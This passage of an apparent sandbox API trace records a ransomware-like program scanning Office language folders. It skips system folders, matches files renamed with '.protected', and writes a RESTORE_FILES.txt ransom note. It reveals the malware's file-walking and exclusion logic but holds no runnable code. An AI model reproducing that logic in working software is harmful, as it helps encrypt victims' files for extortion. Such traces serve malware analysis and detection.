(lpFirst="MOR6INT.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.203] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.203] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", 
lpString2="Program Files") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.203] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.protected") returned 85 [0093.203] StrStrIW (lpFirst="MSOINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.203] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.203] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.203] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.protected") returned 86 [0093.203] StrStrIW (lpFirst="MSOINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.204] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.204] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.204] lstrcmpiW 
(lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.204] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.204] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.protected") returned 85 [0093.204] StrStrIW (lpFirst="OMSINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.204] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.204] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.204] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.204] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.204] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.protected") returned 84 [0093.204] StrStrIW (lpFirst="ONINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.204] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.204] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.204] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 
[0093.204] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.204] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.protected") returned 85 [0093.204] StrStrIW (lpFirst="ONINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.protected") returned 86 [0093.204] StrStrIW (lpFirst="OUTLLIBR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.205] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.205] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", 
lpString2="$Recycle.bin") returned 1 [0093.205] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.205] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.protected") returned 87 [0093.205] StrStrIW (lpFirst="OUTLLIBR.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.205] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.205] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.205] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.205] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.205] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.205] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.205] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.protected") returned 85 [0093.205] StrStrIW (lpFirst="OUTLWVW.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.205] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.205] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.205] lstrcmpiW 
(lpString1="PPINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.205] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.protected") returned 84 [0093.205] StrStrIW (lpFirst="PPINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.205] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.205] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.205] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.205] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.protected") returned 85 [0093.205] StrStrIW (lpFirst="PPINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.205] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.205] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.205] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.205] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.205] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.205] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="System Volume Information") 
returned -1 [0093.205] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.protected") returned 86 [0093.206] StrStrIW (lpFirst="PUB6INTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.206] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.206] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.206] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.206] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.206] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.206] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.206] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.protected") returned 87 [0093.206] StrStrIW (lpFirst="PUB6INTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.206] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.206] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.206] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.206] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.206] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.206] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.206] wnsprintfW (in: pszDest=0x4cfb68, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.protected") returned 87 [0093.206] StrStrIW (lpFirst="PUBWZINT.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.206] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.206] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.206] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.206] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.206] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.206] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\RESTORE_FILES.txt") returned 73 [0093.206] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.206] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.206] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.206] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.protected") returned 83 [0093.206] StrStrIW (lpFirst="SGRES.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.206] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.206] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.protected") returned 84 [0093.207] StrStrIW (lpFirst="STINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: 
hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.protected") returned 86 [0093.207] StrStrIW (lpFirst="VISBRRES.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.protected") returned 85 [0093.207] StrStrIW (lpFirst="VISINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.protected") returned 84 [0093.207] StrStrIW (lpFirst="WWINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.protected") returned 85 [0093.207] StrStrIW (lpFirst="WWINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.protected") returned 86 
[0093.207] StrStrIW (lpFirst="XLINTL32.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.protected") returned 87 [0093.207] StrStrIW (lpFirst="XLINTL32.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.protected") returned 86 [0093.207] StrStrIW (lpFirst="XLSLICER.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.207] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\RESTORE_FILES.txt") returned 73 [0093.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.208] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.208] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\3082") returned 55 [0093.208] lstrcmpW (lpString1="3082", lpString2=".") returned 1 [0093.208] lstrcmpW (lpString1="3082", lpString2="..") returned 1 [0093.208] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\*") returned 57 [0093.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.208] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.208] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.208] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.208] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.208] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.208] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\.") returned 57 [0093.208] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.208] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.208] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.208] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.208] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.208] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.208] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.208] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\..") returned 58 [0093.208] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.208] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0093.208] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.208] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.208] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.208] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.209] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.209] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.protected") returned 86 [0093.209] StrStrIW (lpFirst="ENVELOPR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.209] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.209] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.209] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.protected") returned 86 [0093.209] StrStrIW (lpFirst="GRINTL32.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.209] FindNextFileW (in: hFindFile=0x47ba50, 
lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.209] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.209] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.protected") returned 87 [0093.209] StrStrIW (lpFirst="GRINTL32.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.209] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.209] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.209] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.209] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.209] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.209] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.protected") returned 83 [0093.209] StrStrIW (lpFirst="MAPIR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.209] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.209] 
lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.209] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.209] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.209] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.209] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.protected") returned 86 [0093.210] StrStrIW (lpFirst="MOR6INT.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.210] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.210] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.210] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.210] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.protected") returned 85 [0093.210] StrStrIW (lpFirst="MSOINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.210] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.210] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Windows") 
